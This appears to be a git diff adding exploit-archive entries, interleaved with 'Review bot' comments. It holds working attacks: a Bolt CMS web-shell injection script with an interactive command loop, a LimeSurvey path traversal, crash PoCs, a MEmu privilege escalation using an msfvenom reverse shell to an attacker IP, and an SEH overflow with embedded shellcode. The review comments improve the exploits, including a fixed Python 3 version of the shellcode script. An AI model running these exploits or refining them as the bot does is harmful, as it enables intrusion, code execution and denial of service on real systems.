+▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ +▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ +▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ + ▀▀▀▀▀▀▀▀▀▀▀ + +Pre Auth rce with low credintanl +By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) + + + +if len(sys.argv) != 4: + print((len(sys.argv))) + print((colored("[~] Usage : ./bolt.py url username password","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] + + + +request = requests.session() +print((colored("[+] Retrieving CSRF token to submit the login +form","green"))) +page = request.get(url+"/bolt/login") +html_content = page.text +soup = BeautifulSoup(html_content, 'html.parser') +token = soup.findAll('input')[2].get("value") + +login_info = { + "user_login[username]": username, + "user_login[password]": password, + "user_login[login]": "", + "user_login[_token]": token + } + +login_request = 
request.post(url+"/bolt/login", login_info) +print((colored("[+] Login token is : {0}","green")).format(token)) + + + +aaa = request.get(url+"/bolt/profile") +soup0 = BeautifulSoup(aaa.content, 'html.parser') +token0 = soup0.findAll('input')[6].get("value") +data_profile = { +"user_profile[password][first]":"password", +"user_profile[password][second]":"password", +"user_profile[email]":"a@a.com", +"user_profile[displayname]":"", +"user_profile[save]":"", +"user_profile[_token]":token0 + +} +profile = request.post(url+'/bolt/profile',data_profile) + + + + +cache_csrf = request.get(url+"/bolt/overview/showcases") + +soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') +csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") + + +asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") +soup2 = BeautifulSoup(asyncc.text, 'html.parser') +tables = soup2.find_all('span', class_ = 'entry disabled') + + +print((colored("[+] SESSION INJECTION ","green"))) +for all_tables in tables: + +f= open("session.txt","a+") +f.write(all_tables.text+"\n") +f.close() +num_lines = sum(1 for line in open('session.txt')) + +renamePostData = { +"namespace": "root", +"parent": "/app/cache/.sessions", +"oldname": all_tables.text, +"newname": "../../../public/files/test{}.php".format(num_lines), +"token": csrf + } +rename = request.post(url+"/async/folder/rename", renamePostData) + + + + +try: +url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) + +rev = requests.get(url1).text +r1 = re.findall('php',rev) + +r2 = r1[0] +if r2 == "php" : +fileINJ = "test{}".format(num_lines) + +print((colored("[+] FOUND : "+fileINJ,"green"))) + +except IndexError: +print((colored("[-] Not found.","red"))) + +new_name = 0 +while new_name != 'quit': +inputs = input(colored("Enter OS command , for exit 'quit' : +","green","on_red")) +if inputs == "quit" : +exit() +else: +a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) +aa = a.text +r11 = 
re.findall('...displayname";s:..:"([\w\s\W]+)',aa) + + +print((r11)[0]) + + + + +Greetz to : all my friends \ No newline at end of file diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt new file mode 100644 index 000000000..bda2a8a0f --- /dev/null +++ b/exploits/php/webapps/48297.txt @@ -0,0 +1,18 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11455 + +# Vulnerability Details +# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey +# that allows an attacker to download arbitrary files. The file manager functionality will also +# delete the file after it is downloaded (if the web service account has permissions to do so), +# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. +Vulnerable Parameter : "path" + + +# POC +https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/windows/dos/48284.py b/exploits/windows/dos/48284.py new file mode 100755 index 000000000..a91229f95 --- /dev/null +++ b/exploits/windows/dos/48284.py 
@@ -0,0 +1,35 @@
+# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
+# Discovery by: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.2.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+
+# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers.
+
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48285.py b/exploits/windows/dos/48285.py
new file mode 100755
index 000000000..12369a016
--- /dev/null
+++ b/exploits/windows/dos/48285.py
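Review bot: The `#!/usr/bin/env python` line sits roughly two dozen lines into the file, after the comment header, so it is an ordinary comment rather than a shebang and has no effect; move it to line 1. The `print "..."` statements are Python 2 syntax, so the script fails under the `python3` most testers will reach for; `print("[+] Creating %s bytes payload.." % len(buff))` works on both. The two assignments build one 1000-byte string and read more clearly as `buff = "\x41" * 1000`, and the step list is numbered 1, 3, 2, 6, 5, which looks like a copy-paste slip. The bare `except:` also hides why the file could not be written; `except OSError as e:` and printing `e` would tell the tester whether it was a permission or path problem.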
@@ -0,0 +1,36 @@
+# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
+# Exploit Author: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: https://www.spotauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe
+# Tested Version: 5.3.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+
+# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords,
+# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook
+# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20
+# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms.
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run SpotAuditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48286.py b/exploits/windows/dos/48286.py
new file mode 100755
index 000000000..ce265c73f
--- /dev/null
+++ b/exploits/windows/dos/48286.py
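Review bot: The reproduction steps are numbered 1, 3, 2, 6, 5, so the order the tester is expected to follow is ambiguous; renumber them in the order listed (`# 1.` run the script, `# 2.` open 'Register -> Enter Registration Code', `# 3.` paste into 'Name', `# 4.` click OK). No crash context is given (exception code, faulting address, whether the SEH chain is touched), so the entry documents an unhandled crash only and should not be read as evidence of a controllable overflow; a short debugger excerpt would substantiate the `dos` classification. The file is otherwise identical to 48284.py apart from the product and field name and carries the same Python 2 `print` statements and mid-file `#!/usr/bin/env python`, so the same cleanup applies.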
@@ -0,0 +1,39 @@
+# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
+# Discovery by: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
+# software significantly reduces the total cost of network management in enterprise environments by enabling
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48287.py b/exploits/windows/dos/48287.py
new file mode 100755
index 000000000..01d5a7147
--- /dev/null
+++ b/exploits/windows/dos/48287.py
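Review bot: The only platform listed is `Windows XP - SP3`, out of support since 2014, and the header does not say whether the crash reproduces on a supported Windows release; either add a `# Tested on OS:` line for a current version or state explicitly that it was not tried there, otherwise the entry's relevance is unclear. The bare `except:` around the file write swallows the exception, so a permission or path problem is reported as `POC cannot be created` with no reason; `except OSError as e:` plus `print(e)` is more useful to the tester. As in 48284 and 48285, the `#!/usr/bin/env python` line is not the first line of the file and so is not a shebang, and the `print` statements are Python 2 only.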
@@ -0,0 +1,26 @@
+# Exploit Title: Frigate 3.36 - Denial of Service (PoC)
+# Date: 2020-04-05
+# Exploit Author: inter
+# Vendor Homepage: http://www.Frigate3.com/
+# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
+# Vulnerable Software: Firgate
+# Version: 3.36
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)
+
+#Steps to Produce the Crash:
+
+# 1.- Run python code: crash.py
+# 2.- Copy content to clipboard
+# 3.- Open "Frigate3.exe"
+# 4.- Go to "Disk" > Find Computer
+# 5.- Paste ClipBoard into the "Computer Name:" field
+# 6.- Click on OK
+# 7.- Crashed
+
+#Python "crash.py" Code:
+
+buffer = "\x41" * 2000
+f = open ("Frigate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48288.py b/exploits/windows/dos/48288.py
new file mode 100755
index 000000000..e0a122ff7
--- /dev/null
+++ b/exploits/windows/dos/48288.py
@@ -0,0 +1,23 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
+#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Repeater host" Paste Clipboard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48290.py b/exploits/windows/dos/48290.py
new file mode 100755
index 000000000..eee1b4ddc
--- /dev/null
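Review bot: `# Vulnerable Software: Firgate` misspells the product named everywhere else in the header; `# Vulnerable Software: Frigate`. Step 2 says "Copy content to clipboard" without naming what to copy, while the script writes `Frigate.txt`; `# 2.- Copy the content of Frigate.txt to clipboard` removes the guesswork. The entry ends at "Crashed" with no exception address or faulting module, so 2000 bytes in the "Computer Name:" field is documented as an unhandled crash only; a one-line debugger excerpt would justify the `dos` classification.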
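Review bot: `# Vulnerability Type: Local` names a scope, not a vulnerability class; the title and the `dos` type in files_exploits.csv say denial of service, so `# Vulnerability Type: Denial of Service (DoS) Local` keeps this header consistent with 48284-48287 in the same commit. Step 1 refers to `UltraVNC_1.2.40-Launcher_RepeaterHost.py` while the header gives the version as `1.2.4.0`; harmonise the two so the tester can find the file. As with the other PoCs in this batch, no crash context is given, so the 300-byte "Repeater host" value is evidence of a crash, not of a controllable overflow.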
+++ b/exploits/windows/dos/48290.py
@@ -0,0 +1,24 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
+#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Password" Paste Clipboard
+#6.- Click on "OK"
+#7.- Click on "Propieties"
+#8.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48291.py b/exploits/windows/dos/48291.py
new file mode 100755
index 000000000..f926016a6
--- /dev/null
+++ b/exploits/windows/dos/48291.py
@@ -0,0 +1,22 @@
+# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
+#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
+#3.- Open UltraVNC Viewer
+#4.- In "VNC Server" Paste Clipboard
+#5.- Click on "Connect"
+#6.- Crashed
+
+cod = "\x41" * 256
+
+f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48292.txt b/exploits/windows/dos/48292.txt
new file mode 100644
index 000000000..7155a42ed
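Review bot: Step 7 (`#7.- Click on "Propieties"`) is the line that matters and it is both misspelled and easy to skip: per steps 6-8 the crash does not happen on OK but when the Properties dialog is reopened, which implies the 300-byte password is persisted and the fault is in reading the stored value back rather than in the edit control; a line such as `# The crash occurs when the saved value is read back on reopening Properties` would make that explicit, and it suggests a crafted launcher configuration could reproduce it without the GUI, which is worth confirming. `# Vulnerability Type: Local` should read `Denial of Service (DoS) Local` to match the title and the csv type, and step 1's `1.2.40` disagrees with the header's `1.2.4.0`.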
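Review bot: No crash detail is given (exception address, faulting module, whether SEH is overwritten), so 256 bytes in the "VNC Server" field is documented as a crash on Connect only, not as an exploitable overflow; a short debugger excerpt would substantiate the `dos` classification. Step 2 tells the tester to open `UltraViewer_VNCServer.txt` while the script writes `UltraVNC_1.2.40-Viewer_VNCServer.txt`; align the two names. `# Vulnerability Type: Local` should name the class, `Denial of Service (DoS) Local`, as the title does.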
--- /dev/null
+++ b/exploits/windows/dos/48292.txt
@@ -0,0 +1,22 @@
+# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
+#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select File > Create SSH Key Files...
+#5.- Select "Private key file:" field erease and Paste ClipBoard
+#6.- Click on "Create public/private key files..."
+#7.- Crashed
+
+buffer = "\x41" * 2000
+f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48283.txt b/exploits/windows/local/48283.txt
new file mode 100644
index 000000000..f6b3529a0
--- /dev/null
+++ b/exploits/windows/local/48283.txt
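Review bot: The entry is stored as `48292.txt` but its body is a Python script (`buffer = ...`, `f = open(...)`), and step 1 itself refers to `ZOC_7.25.5_PrivateKeyFile.py`; the sibling UltraVNC entries from the same author in this commit are `.py`, so this one should be too, otherwise `searchsploit -m 48292` hands the tester a `.txt` to rename before running. As with the other PoCs in the batch, the entry stops at "Crashed" with no exception address or faulting module, so it is evidence of a crash in the "Private key file:" path field only. Step 5 has a typo (`erease` -> `erase`) and `# Vulnerability Type: Local` should name the class, `Denial of Service (DoS) Local`.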
@@ -0,0 +1,70 @@
+# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
+# Discovery by: chuyreds
+# Discovery Date: 2020-03-08
+# Vendor Homepage: https://www.memuplay.com/
+# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
+# Tested Version: 7.1.3
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Description:
+# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions
+
+# Prerequisites
+# Local, Low privilege access with restart capabilities
+
+# Details
+# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
+# A low privilege account is able to rename the MemuService.exe file located in this same path and replace
+# with a malicious file that would connect back to an attacking computer giving system level privileges
+# (nt authority\system) due to the service running as Local System.
+# While a low privilege user is unable to restart the service through the application, a restart of the
+# computer triggers the execution of the malicious file.
+
+C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
+C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
+ BUILTIN\Administradores:(I)(F)
+ BUILTIN\Usuarios:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
+
+Se procesaron correctamente 1 archivos; error al procesar 0 archivos
+
+
+C:\>sc qc MEmuSVC
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: MEmuSVC
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : MEmuSVC
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# Proof of Concept
+
+1. Generate malicious .exe on attacking machine
+ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe
+
+2. Setup listener and ensure apache is running on attacking machine
+ nc -lvp 443
+ service apache2 start
+
+3. Download malicious .exe on victim machine
+ Open browser to http://192.168.1.130/MemuService.exe and download
+
+4. Overwrite file and copy malicious .exe.
+ Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
+ Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
+
+5. Restart victim machine
+
+6. Reverse Shell on attacking machine opens
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/local/48293.py b/exploits/windows/local/48293.py
new file mode 100755
index 000000000..13ca75c29
--- /dev/null
+++ b/exploits/windows/local/48293.py
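Review bot: The Details paragraph says "the Authenticated Users group has the modify permission to ESM folders/files", but the icacls output directly below shows `Everyone:(I)(F)` and `BUILTIN\Usuarios:(I)(F)` - Full control for Everyone and Users, not Modify for Authenticated Users - and "ESM" looks like a leftover from another advisory; the text should describe the evidence it cites. Every ACE carries `(I)`, so these rights are inherited from `C:\Program Files (x86)\Microvirt\MEmu\` rather than set on the binary, which is the real root cause and the place the fix applies (remove the Everyone/Users full-control ACE from the install directory); stating that, and showing `icacls` on the directory as well, would make the finding complete. The `sc qc` output (`AUTO_START`, `NOMBRE_INICIO_SERVICIO: LocalSystem`) does support the claim that a reboot runs the replaced binary as SYSTEM. Step 4 renames the live service image and then copies the payload in; Windows normally allows renaming a running executable but not overwriting it, so the rename-then-copy order is load-bearing and deserves a sentence.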
@@ -0,0 +1,79 @@
+# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
+# Date: 2020-04-04
+# Author: Felipe Winsnes
+# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
+# Version: 8
+# Tested on: Windows 7 (x86)
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file called "poc.m3l".
+# 2.- Open the Application.
+# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
+# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
+# 5.- Select the file "poc.m3l".
+# 6.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
+# Payload size: 512 bytes
+
+buf = b""
+buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
+buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
+buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
+buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
+buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
+buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
+buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
+buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
+buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
+buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
+buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
+buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
+buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
+buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
+buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
+buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
+buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
+buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
+buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
+buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
+buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
+buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
+buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
+buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
+buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
+buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
+buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
+buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
+buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62"
+buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
+buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
+buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38"
+buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
+buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
+buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
+buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
+buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
+buf += b"\x75\x4d\x30\x41\x41"
+
+nseh = "\x71\x41"
+seh = "\x41\x4a"
+
+alignment = ""
+alignment += "\x54\x71" # push ebx, padding
+alignment += "\x58\x71" # pop eax, padding
+alignment += "\x05\x20\x22" # add eax, 0x22002000
+alignment += "\x71" # Padding
+alignment += "\x2D\x19\x22" # sub eax, 0x22001900
+alignment += "\x71" # Padding
+alignment += "\x50\x71" # push eax, padding
+alignment += "\xC3" # retn
+
+buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000
+f = open ("poc.m3l", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
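Review bot: `buf` is assembled from `bytes` literals (`buf = b""` and the forty `buf += b"..."` lines) while `nseh`, `seh`, `alignment` and the `"A"`/`"C"` padding are `str`, so the `buffer = ...` concatenation raises `TypeError: can only concatenate str (not "bytes") to str` under Python 3 and only works under Python 2; make every component `bytes` and write with `open("poc.m3l", "wb")`. Text mode `"w"` also subjects the payload to the platform's newline and encoding handling, which a byte-exact overflow file should never be under; `"wb"` is the right mode regardless. `import struct` is unused and can go. The `# add eax, 0x22002000` / `# sub eax, 0x22001900` comments are good; noting that the pair nets EAX + 0x700 would let a reader check the landing point against the 71-byte gap before the payload.

```python
# … unchanged: header comments, `import struct`, and the 40 `buf += b"..."` lines …
nseh = b"\x71\x41"
seh = b"\x41\x4a"

alignment = b""
alignment += b"\x54\x71"      # push ebx, padding
alignment += b"\x58\x71"      # pop eax, padding
alignment += b"\x05\x20\x22"  # add eax, 0x22002000
alignment += b"\x71"          # padding
alignment += b"\x2D\x19\x22"  # sub eax, 0x22001900  (net: eax += 0x700)
alignment += b"\x71"          # padding
alignment += b"\x50\x71"      # push eax, padding
alignment += b"\xC3"          # retn

buffer = b"A" * 536 + nseh + seh + b"\x41\x71\x41\x71" + alignment + b"C" * 71 + buf + b"C" * 2000
# Binary mode: no newline translation or text encoding may touch the payload.
with open("poc.m3l", "wb") as f:
    f.write(buffer)
```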
diff --git a/exploits/windows/local/48299.txt b/exploits/windows/local/48299.txt
new file mode 100644
index 000000000..654d0b495
--- /dev/null
+++ b/exploits/windows/local/48299.txt
@@ -0,0 +1,313 @@ +# Title: Microsoft NET USE win10 - Insufficient Authentication Logic +# Date: 2020-04-04 +# Author: hyp3rlinx +# Vendor: www.microsoft.com +# CVE: N/A + + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Windows "net use" Command + +Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. +The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. + + +[Vulnerability Type] +Insuffient Password Prompt + + +[CVE Reference] +N/A + + +[Security Issue] +The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account +is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately +we do not gain high integrity privileges. However, it opens the 